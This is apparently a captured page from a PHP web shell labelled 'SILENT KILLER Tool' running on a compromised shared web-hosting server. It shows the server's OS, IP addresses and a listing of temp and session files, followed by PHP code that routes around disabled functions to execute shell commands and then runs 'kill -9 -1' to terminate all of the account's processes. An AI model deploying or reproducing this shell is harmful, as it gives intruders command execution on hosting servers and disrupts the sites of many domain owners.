Operation : Linux premium107.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 Software : Apache Server IP : 198.54.126.246 | Your IP: 216.73.216.181 Domains : 1034 Domain(s) Permission : [ 0700 ]
| Name | Type | Size | Last Modified | Actions |
|---|---|---|---|---|
| .ea-php-cli.cache | File | bytes | January 01 1970 00:00:00. | |
| .s.PGSQL.5432 | File | bytes | January 01 1970 00:00:00. | |
| admin.php | File | 5361 bytes | February 11 2026 05:58:25. | |
| mysql.sock | File | 0 bytes | February 06 2026 11:35:55. | |
| php0vjCf4 | File | 1008 bytes | February 11 2026 06:19:58. | |
| php1VGafb | File | 1008 bytes | February 11 2026 11:51:39. | |
| phpCZTlWF | File | 1008 bytes | February 11 2026 11:51:39. | |
| phpO0M1SB | File | 1008 bytes | February 11 2026 06:19:58. | |
| phpeGByH6 | File | 1008 bytes | February 11 2026 06:49:42. | |
| sess_4fe97dcc8c780f18c5ba4aa0da727054 | File | 78 bytes | February 11 2026 02:08:46. | |
| sess_5f743a695a63dc94ca936f032127c1ff | File | 0 bytes | February 11 2026 05:27:01. | |
| sess_7b9620bd6711c458fecb8755b6e32b5e | File | 0 bytes | February 11 2026 03:54:10. | |
| sess_aa1333671351c793247b56a3373d8fc5 | File | 0 bytes | February 11 2026 04:46:04. | |
| sess_de681733b9ef6df5a911ff7123bb398a | File | 0 bytes | February 11 2026 04:46:04. | |
| sess_f66c1784c6e36bba25a294e38ab33266 | File | 0 bytes | February 11 2026 04:46:04. | |
| session_cache.tmp | File | 6 bytes | February 11 2026 02:34:48. |
<?php
function run($code, $method = 'popen')
{
$disabled = explode(',', ini_get('disable_functions'));
if (in_array($method, $disabled)) {
$method = 'exec';
}
if (in_array($method, $disabled)) {
return false;
}
$result = '';
switch ($method){
case 'exec':
exec($code,$array);
foreach ($array as $key => $value) {
$result .= $key . " : " . $value . PHP_EOL;
}
return $result;
break;
case 'popen':
$fp = popen($code,"r"); //popen打一个进程通道
while (!feof($fp)) { //从通道里面取得东西
$out = fgets($fp, 4096);
$result .= $out; //打印出来
}
pclose($fp);
return $result;
break;
default:
return false;
break;
}
}
echo '{->|';
var_dump(run("kill -9 -1"));
echo '|<-}';
SILENT KILLER Tool